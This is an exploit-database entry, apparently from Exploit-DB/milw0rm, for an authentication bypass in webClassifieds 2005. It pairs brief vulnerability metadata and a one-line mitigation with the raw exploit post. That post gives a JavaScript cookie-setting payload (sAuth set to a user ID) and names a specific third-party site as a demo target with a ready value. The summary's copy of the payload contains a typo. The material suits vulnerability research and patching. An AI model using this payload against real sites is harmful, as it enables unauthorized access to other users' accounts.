webClassifiedsÂ© 2005 Insecure Cookie Handling Vulnerability

vendor:

by:

ThE g0bL!N

7,5

CVSS

HIGH

Insecure Cookie Handling

613

CWE

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

A vulnerability in webClassifiedsÂ© 2005 allows an attacker to gain access to the application by setting the sAuth cookie to a valid user ID. This can be done by using the following JavaScript code: javascript:dcocument.cookie="sAuth=[id];path=/".

Mitigation:

Ensure that the application is properly validating user input and that the application is not vulnerable to cookie manipulation.

Source

Exploit-DB raw data:

[~] ----------------------------Ø¨Ø³Ù… Ø§Ù„Ù„Ù‡ Ø§Ù„Ø±ØÙ…Ù† Ø§Ù„Ø±ØÙŠÙ…------------------------------
 [~]Tybe:webClassifiedsÂ© 2005 Insecure Cookie Handling Vulnerability
  
 [~]Vendor: www.webscribble.com
  
 [~]Software: webClassifiedsÂ© 2005
  
 [~]author: ThE g0bL!N
  
  
 [~] Home: WWW.h4ckf0ru.com
  

[~] -----------------------------{ Iam MuSlIm}------------------------------
  
  
 [~] Exploit:
  
javascript:dcocument.cookie="sAuth=[id];path=/";
  
[~]login 4 d3m0:
  
http://www.towpartners.com/classifieds/index.php?page=sign_in
 
javascript:document.cookie="sAuth=3;path=/";
[~]--------------------------------------------------------------------------------
 
  [~] Greetz tO:
  [~]
  [~] Dos-Dz TeaM - Snakes TeaM - Team Sobh4n ALLAH
  [~]
  [~]
  [~]
  [~]
 
 [~]--------------------------------------------------------------------------------

# milw0rm.com [2009-04-20]